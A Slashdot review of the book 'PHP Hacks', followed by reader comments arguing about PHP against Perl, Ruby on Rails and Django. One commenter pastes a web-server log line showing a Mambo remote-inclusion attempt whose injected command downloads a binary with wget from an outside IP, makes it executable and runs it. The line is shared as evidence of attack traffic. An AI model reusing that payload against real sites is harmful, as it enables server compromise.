Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

PHP Hacks

samzenpus posted more than 8 years ago | from the tricks-of-the-trade dept.

165

Michael J. Ross writes "Given the current popularity of the Web development language PHP, it makes sense that newcomers to the language have a large number of introductory and reference volumes from which to choose. But for the more advanced PHP programmer, there are far fewer titles that explain how to make the most of the language, by applying it to solve relatively substantial problems. One such book is PHP Hacks: Tips & Tools for Creating Dynamic Websites, by Jack D. Herrington. Read the rest of Michael's review.

The book was published by O'Reilly Media in December of 2005. Despite its title, PHP Hacks: Tips & Tools for Creating Dynamic Websites is clearly intended to show how PHP's capabilities can be extended beyond its most common usage for creating dynamic and database-driven Web pages, and can be employed in such areas as graphics, reporting, Web site testing, code generation, and even fun purposes (for those few programmers who find the former topics less than entertaining). The author, assisted by six contributors listed in the Credits section, manages to pack an impressive number of general programming ideas and PHP-specific topics within this title's 468 pages. The material is grouped into 10 chapters, each of which contains a generous number of "hacks," each in its own section.

As with most if not all of the other titles published by O'Reilly, this book has a Web page that offers an overview of the book, its table of contents, all of the book's code (in both Zip and tar file format), and a list of confirmed and unconfirmed errata. In addition, the site hosts five sample hacks (in PDF format): accessing iPhoto pictures, generating Excel spreadsheets, avoiding the "double submit" problem, reading RSS feeds on your PSP, and creating custom Google Maps. Perusing these hacks would give the prospective buyer a clear sense as to the style of the book's other 95 hacks, as well as the (low) level of PHP expertise needed to understand them.

The book begins with a preface that describes the organization, conventions, and icons chosen for the book. Also, it covers the legality of the code samples, lists contact information, and mentions O'Reilly's Safari online book service, which contains this title among many other PHP resources. What is perhaps most unique about this book's preface is that the author identifies over half a dozen weaknesses commonly seen in PHP applications, and explains how his book addresses those problems. In addition, he makes explicit how some of the hacks can be used for jazzing up one's Web site or Web-based application.

The first chapter discusses how to install PHP on Windows, Mac OS X, and Linux, and then verify that the installation was done properly. Herrington then briefly explains how to install MySQL and perform some basic database management. The chapter concludes with coverage of installing the PEAR library on your local machine and on your Web host's server (which is incorrectly identified as your "ISP machine," apparently assuming that most developers choose their Internet service providers for hosting their sites, when in fact the opposite is true). Since the typical reader of a non-beginning book such as this no doubt has one or more introductory and/or reference PHP books at hand, it would seem superfluous to waste time and space explaining how to install these components. But few pages are taken up by the material.

The next chapter is devoted to hacks that help to jazz up the design of one's Web sites, including how to create a skinnable interface, build a breadcrumb trail, create HTML boxes, add tabs to your interface, and other valuable techniques. Subsequent chapters offer hacks in the areas of dynamic HTML (DHTML), graphics and digital pictures, databases and XML, application and e-commerce design, patterns and PHP object orientation, testing and documentation generation, and building alternative user interfaces. The 10th and final chapter covers some "fun stuff," such as creating dynamic playlists, developing a media upload/download center, and even putting Wikipedia on a Sony PlayStation Portable.

Rather than try to explain in detail all of the many topics covered in the book, I instead encourage the interested reader to visit the publisher's Web page, and scan through the table of contents provided, to get a better idea as to how much of the book would be of interest to the individual. Also, the five sample hacks listed on the site, would be well worth examining and trying out. Overall, the topics chosen reflect favorably upon the judgment of the lead author and the other contributors to the book. The typical PHP veteran would likely be interested in most of the applications covered, and would probably learn some new tricks, especially in the areas of patterns and code testing, regardless of their level of experience.

Like all books, this one is not perfect. As with the first printing of most technical books; particularly those chock-full of source code; the book contains a fair number of errata, likely even greater in number than those reported and listed on the publisher's Web site, as mentioned earlier. Consequently, any reader who chooses to test the sample code and he or she would be encouraged to do so; should keep one browser window or editor buffer open and devoted to those errata, so as to minimize the time spent trying to figure out why some sample code is not working as advertised.

Some readers posting in forums have complained that the sample code has evidently not been fully tested on all platforms, nor in all Web browsers. Since few if any reviewers would have the time, resources, or inclination to verify these claims, it should suffice to simply bear in mind that the script output and other behavior detailed in the book might not exactly match those experienced during one's own usage of the code.

The fact that there were several cooks in the kitchen brewing up this particular book, is obvious from the way that the code formatting is not consistent throughout the book, as well as the variety of problem-solving styles. Fortunately, neither weakness is of much consequence, and the latter might even be considered a "feature," as it allows the reader to see how a number of veteran PHP developers approach solving a problem.

Most technical works written by a team of authors, end up as excessive "doorstops" that are often frustrating to read as a result of the wildly inconsistent writing and coding styles, to say nothing of the material often being out of date as a result of the long production time needed by the publisher. The opposite case can be even worse, when a publisher releases a book that was clearly thrown together as quickly as possible to capitalize upon a hot new trend in technology. Thankfully, PHP Hacks keeps the style differences to a minimum, and benefits from having a lead author responsible for the book as a whole.

Some programming purists may take issue with the use of the term "hack" used as a synonym for a small PHP application or the use of such for solving a problem, since the majority of the PHP scripts in the book do not involve any programming or problem-solving that would be considered notably clever or elegant. Yet the misuse of the term seems to be spreading, and is not limited to this particular book ; another example of marketing overpowering stability of language. In the preface of PHP Hacks, the author explains that he uses the term in the positive sense of creative participation, to help reclaim it from its popular usage in place of the more traditional term "cracking," i.e., breaking into systems.

Yet aside from these complaints, PHP Hacks is a worthy title that offers explanations and source code for many valuable site-enhancing applications, testing and code generation techniques, and critical e-commerce safeguards. I recommend this book to any PHP developer who would like to add to their Web sites' capabilities, as well as their knowledge of what PHP can do.

Michael J. Ross is a freelance writer, computer consultant, and the editor of the free newsletter of PristinePlanet.com."


You can purchase PHP Hacks: Tips & Tools for Creating Dynamic Websites from bn.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

cancel ×

165 comments

Sorry! There are no comments related to the filter you selected.

I think Slashdot is trying to cheat us here.... (0, Informative)

Anonymous Coward | more than 8 years ago | (#15662991)

Yet again Slashdot links to BN.com for kickbacks when Amazon has it cheaper [amazon.com] .

Re:I think Slashdot is trying to cheat us here.... (1)

armyofone (594988) | more than 8 years ago | (#15663133)

Yet again Slashdot links to BN.com for kickbacks when Amazon has it cheaper.

And Bookpool ** [bookpool.com] has it for virtually the same price as Amazon.

** This is a non-affiliate link.

Re:I think Slashdot is trying to cheat us here.... (0)

Anonymous Coward | more than 8 years ago | (#15663332)

PHP Hacks

Isnt't than a Pleonasm [wikipedia.org] ?

Yet again Slashdot links to BN.com for kickbacks when Amazon has it cheaper.

Oh my god, the horror! A commercial site trying to make money off unsuspecting morons ... who would have guessed.

BS Re:I think Slashdot is trying to cheat us here (3, Interesting)

VP (32928) | more than 8 years ago | (#15663374)

Slashdot provides a place for reviews of technical books. They get to specify the URL and get referrer credit for it. The reson it is BN is because of the Amazon "One-click" patent, for which they sued BN - so using Barnes and Nobble both supports Slashdot, and provides a small way to fight obvious SW patents...

On the other hand, looks like the parent put their own referrer link to Amazon - now that's what I call cheating!

Re:I think Slashdot is trying to cheat us here.... (0)

Anonymous Coward | more than 8 years ago | (#15664133)

Trying to cheat us? Perhaps it is only you... since when I buy something I shop around. What a load of bull shit this forum generates.

You got that right (3, Funny)

Anonymous Coward | more than 8 years ago | (#15663001)

PHP is a bunch of hacks.

Re:You got that right (0)

Anonymous Coward | more than 8 years ago | (#15663088)

the hardest part about using PHP to telling your dad you wet the bed ... again.

Read the title real quick.... (-1, Troll)

Anonymous Coward | more than 8 years ago | (#15663285)

and I saw "PHP Sucks".

I read again, only to realise that it said "PHP Hacks". I also realised that it, indeed sucks. PHP5 won't be compatible on things like strings with PHP6. Where do they wanna go with that?

Re:Read the title real quick.... (2, Informative)

no_barcode (840948) | more than 8 years ago | (#15663716)

Strings will not be broken in PHP 6. Most of the changes that might cause older applications or current applications taking advantage of deprecated functions to fail have had years to make the changes needed to prevent such failures and/or abnormal program terminations. http://www.corephp.co.uk/archives/19-Prepare-for-P HP-6.html [corephp.co.uk] http://wiki.cc/php/PHP6 [wiki.cc]

Re:You got that right (1, Insightful)

Anonymous Coward | more than 8 years ago | (#15663484)

I don't see why everyone is so critical of PHP. PHP does have its downfalls like any other programming language but there are a lot of things that make it so much easier. PHP has a lot of functions and although some people critisize this, it makes it much easier to accomplish many different tasks. I am a person who programs in PHP almost everyday and have been doing so very a few years now and I will admit that things such as magic quotes (though easily fixed) are a pain for beginners and worries such as SQL Injection and careful use of session variables do make development time longer. However there are also a lot of different frameworks out there. Infact, I am writing my own for a client right now which I will later use as part of my portfolio to join a future project. Search Google or Sourceforge and you will find hundreds of these frameworks and APIs which solve many of these problems so that you don't even have to think of them. When I am done with my current project, I can't wait to take a look at some of these frameworks myself. I've been programming in raw PHP for a long time and would love to see what they have to offer. The only reason I haven't is because I am required to know and teach raw PHP to students for my high school's website class and because my recent client requested a custom framework and CMS. However for every day developers and hobbyist, they can make PHP just as versatile as Ruby on Rails.

Re:You got that right (3, Insightful)

PCM2 (4486) | more than 8 years ago | (#15663530)

PHP has a lot of functions and although some people critisize this, it makes it much easier to accomplish many different tasks.

In my experience, it's not so much a case of an embarrassment of riches but more like what the parent said -- it feels like a bunch of hacks. For example, standard library functions that seem similar in almost every respect, save that they work on different data types, take different parameters (or accept them in a different order). This can be very frustrating for experienced programmers who want to get up to speed quickly. Presumably it's less of a worry if you're just learning on PHP.

I don't hate PHP. I don't really like it, either, though. I'm one of those people who is quick with a snide comment about it whenever it's brought up, just because it has always feels so amateurish, poorly designed, and slapdash to me. That said, you can do some pretty decent stuff given a database abstraction layer and Smarty templates (for example). And the one big advantage it has over Ruby on Rails is that it's available on just about every cheapie $5/month Web host around, whereas RoR is barely supported.

Re:You got that right (3, Informative)

VGPowerlord (621254) | more than 8 years ago | (#15663698)

I don't see why everyone is so critical of PHP.

PHP started out as a set of Perl scripts in 1995, presumably using the then-new Perl 5. When it became its own language in 1997, it somehow lost namespaces, the module loading system, DBI, use strict, and everything else in Perl that doesn't register on the suck-o-meter. It also did silly things like adopt the TCL global variable system, rather than using the one that C, Perl, Java, and even things like VB use.

So, yeah, there's a reason every is critical of PHP.

Sources: perldoc perlhist [cpan.org] (perl 5.000 was released on 1994-Oct-17), PHP History [php.net] (PHP/FI 1.0 was a bunch of Perl scripts released in 1995, PHP/FI 2.0 was written in C in 1997), DBI::Changes [cpan.org] (First official DBI release was 0.58 released in 21 June 1995)

Re:You got that right (1)

ednopantz (467288) | more than 8 years ago | (#15664418)

PHP is VB for Unix Weenies: fast, cheap, and sloppy. It is possible to write good code in php, it just isn't common.

The PHP people should sue. (0)

Anonymous Coward | more than 8 years ago | (#15663004)

ORA is making money of the trade name PHP - they should sue him! Least you forget we are talking about a company who feels it is ok to threaten other how put 2.0 after the word web.

I Read "PHP Hacks"... (2, Funny)

guitaristx (791223) | more than 8 years ago | (#15663022)

...as those persons whose technical acuities are slightly greater than "Script Kiddies". Maybe I just hate PHP.

You do (5, Insightful)

Unski (821437) | more than 8 years ago | (#15663112)

it's just the fashion at the moment. Bashing Java is a classic, but PHP, like 80's ra-ra skirts and lip gloss, goes in and out of fashion constantly. Just stick to praising R-o-R, that'll keep the karma nice n' safe.

Re:You do (0)

Anonymous Coward | more than 8 years ago | (#15663457)

but PHP, like 80's ra-ra skirts and lip gloss, goes in and out of fashion constantly.

Most real web-developers hated Personal Home Page since the beginning. It had absolutely nothing that could not be done with Perl. It's libraries were and are thin, fragile wrappers over arbitrary C-libraries, unlike the superb CPAN.

It sends shivers of disgust down the spine of every serious developer.

Re:You do (0)

Anonymous Coward | more than 8 years ago | (#15663504)

While developers such as myself, who aren't afraid (or too arrogant) to use PHP are busy raking in six figure incomes while you sit there and bitch about how much Perl (or the buzzword-infested RoR) is. Who's laughing now? Self-proclaimed "serious" developers are usually the ones bitching and moaning, filling up the so-called "Blogosphere" with useless rants but not actually producing anything except maybe a few megabytes of plaintext per month. The most successful developers in the world are the ones who actually, you know, develop.

Re:You do (5, Insightful)

Fnkmaster (89084) | more than 8 years ago | (#15663512)

It sends shivers of disgust down the spine of every serious developer.

Unlike Perl?!?! Perl is just a foul, disgusting-looking beast. While the PHP libraries may be a touch on the fragile and "arbitrary" side, compared to the libraries in Java, for example, the language itself is like Miss America to Perl's Roseanne Barr.

The "serious developers" who used to write web apps in Perl and TCL, when those were the two most popular choices for such things back in the day, generally produced write-only web monstrosities that could never be picked up or figured out by anybody else, "serious developer" or not.

PHP is relatively fast, simple, syntactically straightforward, and easy to work with. This makes it a good choice for a variety of web applications, though obviously not always the best choice. For some of us, getting the job done is more important than feeling like an elite hax0r.

Re:You do (2)

WilliamSChips (793741) | more than 8 years ago | (#15664097)

Actually, it's more like this: Python is to Amanda Tapping as Perl and PHP are to Roseanne Barr.

Re:You do (0, Flamebait)

PhrostyMcByte (589271) | more than 8 years ago | (#15664443)

PHP is relatively fast, simple, syntactically straightforward, and easy to work with. This makes it a good choice for a variety of web applications, though obviously not always the best choice. For some of us, getting the job done is more important than feeling like an elite hax0r.

If you only ever have one machine, good for you. If you don't need to have plans to maintain your code, doubly good for you!

But porting PHP apps across developers or machines with even slightly different versions or configurations is a PITA that developers *should not have to deal with*. The spaghetti code that PHP seems to encourage in a lot of people just isn't worth the pain, and almost any developer who's done serious non-web programming will tell you that. It's not about being elite, it's about knowing how immature of a language PHP is. PHP is good for simple pages, but other sites should seriously move to something else until the framework matures a lot.

can you clarify that? (4, Funny)

mcmonkey (96054) | more than 8 years ago | (#15663036)

Also, it covers the legality of the code samples...

And....? I presume if all the code samples were legal, such a statement would be unnecessary. I further presume such a statement to that effect would not warrant inclusion in a book review.

So just what is the aspect of the legality of the code samples in need of clarification? Is one of the 'hacks' phishing with PHP? Adding free copies to your Kinkos card? Downloading launch codes from the WOPR? They're using the PHP to cook up meth, aren't they? *peer*

I'll try (1, Informative)

Anonymous Coward | more than 8 years ago | (#15663209)

I believe the article author is talking about licensing of code samples. That's always a problem with some books, there's no license for the sample code, so you have to if it can be used in any project or none at all. Having a clear explanation for using the sample code is sometimes nice when you're dropping some code from an example into your code to fix a problem you've been having.

Can't let this go (1, Offtopic)

Reality Master 101 (179095) | more than 8 years ago | (#15663048)

In the preface of PHP Hacks, the author explains that he uses the term in the positive sense of creative participation, to help reclaim it from its popular usage in place of the more traditional term "cracking," i.e., breaking into systems.

I hate historical revisionism like this. The traditional word for breaking into systems is HACKING, because breaking into systems was considering "clever", along with other clever usages of computers. Some busybodies decided that it gave hackers a bad name, and thus "cracking" was coined. The word is an abomination and I, for one, refuse to use it.

Re:Can't let this go (2, Funny)

qsqueeq (586979) | more than 8 years ago | (#15663134)

Well stop using it. You just used it twice. I for one have stopped using the word "use" and any words that use it.

Re:Can't let this go (1)

PCM2 (4486) | more than 8 years ago | (#15663547)

I hate historical revisionism like this.

Yeah, no kidding. The reason this book is called "hacks" anything is not because the author sat down and thought long and hard about it, but because O'Reilly has branded entire line of books with the word "hacks." I doubt the author even had a choice in the matter.

"Crack" (0)

Anonymous Coward | more than 8 years ago | (#15663918)

"Crack" was not so newly coined as such. Breaking encryption was referred to as "cracking," as well as breaking copy protection. Breaking into locked system doesn't seem that far off from these usages.

Hacks? (3, Insightful)

mikeal (968191) | more than 8 years ago | (#15663070)

What defines a "hack" these days.

Maybe I'm a bit bitter, and even at the risk of sounding like a troll I'm just gonna say it, isn't writing ANY decent amount of php kind of a hack.

Personally I'm a django fan, I really respect the rails kids for what they are doing too. Once you start doing web development in a real dynamic language you realize that web development in php in most cases IS a hack.

I've written lots of php over the years, and I'm so glad to know that I NEVER HAVE TO DO IT AGAIN. Unlike in other languages the "hacks" in php tend to be a necessity for doing development in the language. I've really tried to write "clean" code in php and it's just not possible for any project of a decent size.

Any disagreements?

Re:Hacks? (1)

nuzak (959558) | more than 8 years ago | (#15663100)

> What defines a "hack" these days.

Any snippet that will move O'Reilly's new line of crappy shovelware books.

Re:Hacks? (3, Interesting)

gamlidek (459505) | more than 8 years ago | (#15663124)

I don't disagree at all, but I must say that PHP is fairly popular and has its place. And tools are finally coming out that help organize the messiness of PHP, like Trustudio's PHP IDE. I think of PHP as kind of a quick-and-dirty approach to web development.

-gam

Re:Hacks? (2, Interesting)

mikeal (968191) | more than 8 years ago | (#15663206)

I think you're correct about it being a "quick-and-dirty" approach, but I think usefullness of that breaks down once you realize that you have to maintain and continue to build the majority of web projects you create. Managability is key to being able to do that and I think PHP as a language fundamentally lacks that ability.

One of the django guys quoted a Rails line which was "php is the devil" and went on to say "and it is, because it tricks you. They make it so easy to build out 90% of your web app, but then that last 10% is SO HARD"

I personally find it much easier writing web apps in django than php. But then again I love python and I love full object orientation so I may be in the minority in thinking that it's easier.

I think that a lot of the people who like PHP.... (1)

Fallingcow (213461) | more than 8 years ago | (#15663229)

... are ex-PERL CGI coders.

Which would explain a lot.

(I fall in to this category)

Re:Hacks? (0)

Anonymous Coward | more than 8 years ago | (#15663459)

Odd, I've never had any trouble building 100% of the web interface of a webapp in any language I've used. Now, getting the last 10% of the business logic done is SO HARD.

Re:Hacks? (1)

multimediavt (965608) | more than 8 years ago | (#15663899)

I don't know....look at Windows code and tell me it's ANY different from PHP in being a "quick-and-dirty" hack? It's amazingly popular, people CONSTANTLY complain about it, but people KEEP FUCKING USING IT!!!!! PHP. Same thing.

I should add... (1)

multimediavt (965608) | more than 8 years ago | (#15663931)

I'm a Mac OS X / Linux guy, so programming PHP makes me feel dirty. I avoid that other dirty thing (Windows) as much as possible. Too dirty for me. Just as quick, though.

Re:Hacks? (3, Interesting)

drspliff (652992) | more than 8 years ago | (#15663667)

Trustudio's PHP IDE is ok, but way behind the competition and hardly a finished product (their charging licensing for a beta version!).

On the other hand I've been using NuSphere's PHPed and Zend's own ZendStudio for quite a while now, they both support remote debugging, the latest version of PHP, version control and code profiling and are both much more advanced and stable compared to Trustudio.

PHP is no longer a baby language, and although it really annoys me sometimes (hello! no multiple inheritance or large integer/floating point number support) big real world applications are being written in it and most times I consider it much cleaner than Java when you know what you're doing.

It's the age old thing, if you make it easier for good programmers to program, they'll get working code out of the door with much less bugs compared to a stricter language. It's quick and at times dirty, but it's understandable, you can apply [insert buzzword here] with little to no effort and it runs on most of the world's web hosting servers.

For example, move from C to C++ and you will almost certainly be more productive, from C to D, from C++ to Java, from Bash to TCL, from Java to PHP.. you get the picture. When I've got a tight deadline and lots of features to implement, I'm going to want to do it in whichever language is most productive, this is why you see people adding backend JavaScript/BSH support to their J2EE webapps *laugh*.

Re:Hacks? (0)

Anonymous Coward | more than 8 years ago | (#15663152)

Once you accept that hacks are part of php development, it'sn't so bad. (Go crazy grammar nazis! I just said 'it'sn't'! - And I used exclamation outside of quotes! WOOT!)

Re:Hacks? (1, Insightful)

Anonymous Coward | more than 8 years ago | (#15663194)

I disagree, you probably just couldn't figure out "how to" hack it to make it work for big projects.

Re:Hacks? (1)

ScottLindner (954299) | more than 8 years ago | (#15663254)

My view of a hack is an implementation without a design. Typically hacks are done by very intelligent people that can many times succeed without doing any design work at all. The doesn't mean doing a design is for dumb people, or hacking is necessarily bad. There are times when hacks are legit, and times they should be avoided. I'd get into those topics but they are getting a pinch off topic and would be long winded.

Re:Hacks? (1)

scwizard (941758) | more than 8 years ago | (#15663420)

Any disagreements?
Well it is possible to write clean PHP code when your working on tiny projects. Tiny projects are fun, I do them sometimes in my spare time.

I don't get why people continue to whine about how bad PHP is for large websites. We know that it's a bad choice for that kind of thing, that's because it's not designed with that kind of thing in mind. However due to being easy to set up and deploy PHP is good for small quick fun projects.

So either your an all work no play kind of guy, or your too damn elitist to ever chose to handle a "second class" language. You should try PHP again sometimes, it can be fun.

Re:Hacks? (1)

protohiro1 (590732) | more than 8 years ago | (#15663580)

I really think PHP5 changes a lot of that. I am building a couple of apps right now in php with front controllers and a true MVC arch. With php 5 you can create a command factory or whatever cool stuff you need. Caching is still a sore point, but I think it is a very powerful tool for small to medium size projects. When the projects get huge....maybe not so much, except maybe Yahoo style with PHP as a front end language and the back end in Perl/Python and c++.

Re:Hacks? (1)

Grimboy (948054) | more than 8 years ago | (#15663607)

IMHO if an idea has merit it's only a certain amount of time before it gets big. Besides, I find programming in python with django much more fun. It's funny the way php tends to get touted for enterprise web sites.

Re:Hacks? (1)

Grimboy (948054) | more than 8 years ago | (#15663454)

I too use Django, I'm dissapointed at the lack of a djangoforge though. Still, overall I enjoy it a lot more than php (which I have a work experiance job doing, kind of happy that I managed to get a programming one, a wee bit pissed off its in php).

Django is super duper awesome, it would be good if there was a book like "Django Patterns" or something because I was a little bit unhappy using template tags at first but then it just started working for me.

Re:Hacks? (1)

mikeal (968191) | more than 8 years ago | (#15663507)

It's not 1.0 yet. After it goes 1.0, expect books, press and better documentation.

Re:Hacks? (0)

Anonymous Coward | more than 8 years ago | (#15663470)

I'm working on a research project that makes an MVC (Model, View, Controller) like approach work in PHP. In any object oriented language, you can build your own platform. Generally, PHP is just a bunch of scripts, but it can be as powerful as you want.

You have to change the way you think about a web application though. (Just like with JSP's MVC)

PHP is a toy (-1, Flamebait)

Anonymous Coward | more than 8 years ago | (#15663083)

PHP is a toy language for kids.

How I make a website using PHP (1)

greenguy (162630) | more than 8 years ago | (#15663106)

1. Install Drupal.

OK, I'm good to go!

Better Suggestion (-1, Offtopic)

Anonymous Coward | more than 8 years ago | (#15663131)

Here's a good book for those who fancy themselves php experts: http://diveintopython.org/ [diveintopython.org]

From the title... (2, Interesting)

Anonymous Crowhead (577505) | more than 8 years ago | (#15663148)

I thought maybe it would explain the constant hack attempts on non-existent php apps on my webservers.

[admin@bsever logs]$ tail -100000 access_log |grep php -i |wc -l
      2128

2% of last 100K hits. I run no php on it + this is a test server that is not linked to anywhere public.

For example:

65.110.43.170 - - [04/Jul/2006:00:37:03 -0700] "GET /articles/mambo/index2.php?_REQUEST[option]=com_co ntent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolu te_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tm p;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon ;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Re:From the title... (3, Insightful)

Nos. (179609) | more than 8 years ago | (#15663204)

Yup, but this comes down to what all dicussions do when a PHP topic is posted to slashdot. Is it the fault of the language when a lot of open source applications are written poorly? There have been very few vulnerabilites in PHP, but lots in apps like Mambo, *Nuke, phpBB, etc.

I like PHP, I can develop stuff very quickly in it, and I know how to secure code against CSS, SQL-Injection, etc. There are shortcomings with it, like basically every other language, but I don't think the fact that all these application with vulnerabilities should be a direct reflection on the language itself.

Re:From the title... (1)

richdun (672214) | more than 8 years ago | (#15663316)

Well said. Too many PHP apps are developed from the perspective that "Well I wrote the data to look like $X, so it will always come in as $X" - and as someone without any formal CS/programming training beyond an introductory C++ course, I really wish those PHP "experts" would protect against such easy vulnerabilities. Just because your machine makes square pegs, and the hole is square, doesn't mean I'm not going to try to shove a slightly smaller triangular peg in it.

Re:From the title... (1)

daeg (828071) | more than 8 years ago | (#15663337)

You can shove your square peg into my triangular opening any time.

Re:From the title... (1)

telbij (465356) | more than 8 years ago | (#15663323)

There are shortcomings with it, like basically every other language, but I don't think the fact that all these application with vulnerabilities should be a direct reflection on the language itself.

Well yes and no. I mean, PHP does have some braindead configuraion options that result in insecure code. Writing code that's secure with register_globals on is more work than just turning it off. Likewise handling both cases of magic_quotes_gpc is just a pointless hoop to have to jump through.

I don't really blame the language for being easy to use, and thus easy for talentless hacks to use... but definitely the open source code would be better if the language was better. Every time I write anything in PHP I get irritated by barebones the syntax really is. I mean, if I want verbose everything-is-an-api language I'll use Java and get real objects. If I want to be able to express things concisely I'll use Ruby. The only place PHP is really optimized is for adding little snippets of dynamic code into web pages. It's a huge niche, but one thats inevitably gonna be filled with bad open source code.

Re:From the title... (1, Interesting)

Anonymous Coward | more than 8 years ago | (#15663870)

>Likewise handling both cases of magic_quotes_gpc is just a pointless hoop to have to jump through.

--

if(get_magic_quotes_gpc())
{
        $_POST = array_map('stripslashes', $_POST);
        $_GET = array_map('stripslashes', $_GET);
        $_COOKIE = array_map('stripslashes', $_COOKIE);
}

It's not really pointless, and it's very easy to deal with. Just stick that code in a file and require the file in all others at the top. Now all data coming in, is as the user sent. So validating your data is now up to you. However you could easily flip it around.

if(!get_magic_quotes_gpc())
{
        $_POST = array_map('addslashes', $_POST);
        $_GET = array_map('addslashes', $_GET);
        $_COOKIE = array_map('addslashes', $_COOKIE);
}

But I don't like automagic crappy validating so I always use the first example.

Re:From the title... (2, Insightful)

dedazo (737510) | more than 8 years ago | (#15663393)

Is it the fault of the language when a lot of open source applications are written poorly?
Why not? That's the reason why Visual Basic was considered "worthless", as if it were inherently impossible to create something useful (well documented, maintainable, stable, etc) with it.

Not that I agree with either view, but it seems to me PHP is no better than Visual Basic in this regard.

Re:From the title... (3, Insightful)

FooAtWFU (699187) | more than 8 years ago | (#15663494)

Is it the fault of the language when a lot of open source applications are written poorly?

Yes. The language doesn't actually compel you to write insecure code, but it would be hard to imagine one which came closer. It's practically begging for injection everywhere. You need to manually escape everything. Database work? Sorry, no prepared statements. Going to send mail()? Leave a few newlines in the wrong variable and you can turn your form into a lean, mean spamming machine! Going to try and call system() with any sort of parameters? Quick check: do you want escapeshellcmd, or escapeshellarg? (and of course, you HAVE to use the shell.) There's more, much more, and if that's not enough, two words should make your skin crawl: "register globals".

use strict; use warnings; taint mode? In your dreams maybe...
Model-view-controller design? ... I think they used a shotgun on it.

GAAH.

Re:From the title... (1)

Photon Ghoul (14932) | more than 8 years ago | (#15663312)

That's a *Mambo* hack attempt, not a *PHP* hack attempt.

Re:From the title... (1)

Anonymous Crowhead (577505) | more than 8 years ago | (#15663882)

Yeah? Well *Mambo* is a *PHP hack*.

Advanced PHP programmer? (3, Funny)

bsartist (550317) | more than 8 years ago | (#15663225)

"Advanced PHP programmer"? Now there's a contradition for you.

Re:Advanced PHP programmer? (1)

geniusj (140174) | more than 8 years ago | (#15663402)

I was actually pretty surprised to see this book. Assuming that this is the same Jack Herrington that I once knew (and I'm pretty sure it is), he's pretty big into Ruby. Or at least he was. Didn't know he had a background in PHP.

perhaps, but, um..... (1)

rucs_hack (784150) | more than 8 years ago | (#15663443)

One of the highest paid coders I know uses php.......

Personally I wouldn't touch it, not my kind of coding, but you have to admit it's good stuff.

Also, lets not forget that there's a lot of very complex code underlying php, and the guys who wrote that simply *are* very good at what they do. Advanced is a word I'd be comfortable with.

You don't find that kind of talent everywhere, but where you do we all benifit by getting to do things in a simpler way.

Re:perhaps, but, um..... (1)

bsartist (550317) | more than 8 years ago | (#15664222)

One of the highest paid coders I know uses php.
Judging by that benchmark, Bill Gates would be classified as the world's best programmer.

Also, lets not forget that there's a lot of very complex code underlying php
Complexity is not always a benchmark of programming skill either. Sometimes it's a sign that the programmers didn't have the skills to come up with a simpler, more elegant design. Having said that, I've never looked "under the hood" of PHP, and I don't know the programmers. I'm not sayng they're hacks, I'm just saying that PHP's internal complexity doesn't really prove anything either way.

Re:Advanced PHP programmer? (1)

zerocool^ (112121) | more than 8 years ago | (#15663560)


Exactly. When I saw "PHP Hacks", I thought the people behind PHP-Nuke had written a book.

Re:Advanced PHP programmer? (1)

DieByWire (744043) | more than 8 years ago | (#15663715)

...Now there's a contradition for you.


Now there's a slashdot 'speler' for you... ;-)

Re:Advanced PHP programmer? (4, Funny)

LordLucless (582312) | more than 8 years ago | (#15663800)

A contradiction, sort of like a person who has a grammar nazi post in their sig, but can't spell contradiction?

Re:Advanced PHP programmer? (1)

WilliamSChips (793741) | more than 8 years ago | (#15664108)

No, that's just ironic, and also one of those laws whose name I can't remember. What's also ironic is that Alanis's song doesn't contain a single actual instance of irony.

Re:Advanced PHP programmer? (2, Insightful)

Cl1mh4224rd (265427) | more than 8 years ago | (#15664115)

What's also ironic is that Alanis's song doesn't contain a single actual instance of irony.
That's the irony...

Re:Advanced PHP programmer? (1)

bsartist (550317) | more than 8 years ago | (#15664181)

A contradiction, sort of like a person who has a grammar nazi post in their sig, but can't spell contradiction?
LOL! Yes, just like that. :-)

Re:Advanced PHP programmer? (1)

truedfx (802492) | more than 8 years ago | (#15663814)

"Advanced PHP programmer"? Now there's a contradition for you.
Not at all. It simply means PHP is not that programmer's only language. :)

I'm not a php/perl guru, but (4, Interesting)

ardor (673957) | more than 8 years ago | (#15663230)

anyone can tell me if this is to be taken seriously, or rather seen as worthless php-bashing?
http://tnx.nl/php [tnx.nl]

Re:I'm not a php/perl guru, but (2, Informative)

chromatic (9471) | more than 8 years ago | (#15663280)

Draw whatever conclusions you like, but the linked page is accurate.

Re:I'm not a php/perl guru, but (1)

Photon Ghoul (14932) | more than 8 years ago | (#15663336)

Those are all valid concerns, although with some heavy Perl bias. Of course, the PHP problems pointed out are generally being worked on - but you have to move slowly because of the installed base (who also generally don't upgrade very often).

That said, I am definitely in the market for a new language to build sites with. Perl ain't it as I've been there and done that. Great language but I would rather maintain/fix crappy PHP sites than crappy Perl sites.

Re:I'm not a php/perl guru, but (2, Interesting)

Photon Ghoul (14932) | more than 8 years ago | (#15663346)

"I am definitely in the market for a new language to build sites with."

To clarify: I'm a professional PHP developer but finding the language doesn't grow with me as a grow as a developer. Looking into RoR but the hype scares me (memories of Java).

Re:I'm not a php/perl guru, but (1)

Senzei (791599) | more than 8 years ago | (#15663428)

That said, I am definitely in the market for a new language to build sites with. Perl ain't it as I've been there and done that. Great language but I would rather maintain/fix crappy PHP sites than crappy Perl sites.
If you are looking for something that still retains most of the useful parts of perl then RoR, or one of the other Ruby web dev frameworks (yes, they do exist) might be the way to go.

Personally I am happy with Python, especially considering the community is really starting to get behind WSGI, which will end up turning the "Python has 1001 web frameworks" issue into a good thing by making it possible for individual components from each framework to interoperate. Out of the ones I have tried I like TurboGears the most, but have yet to come across anything that resembles the shoot-your-foot-while-putting-it-in-your-mouth situation that I have come across in php.

Re:I'm not a php/perl guru, but (0)

Anonymous Coward | more than 8 years ago | (#15663694)

try http://cakephp.org/ [cakephp.org] to take a breath with php

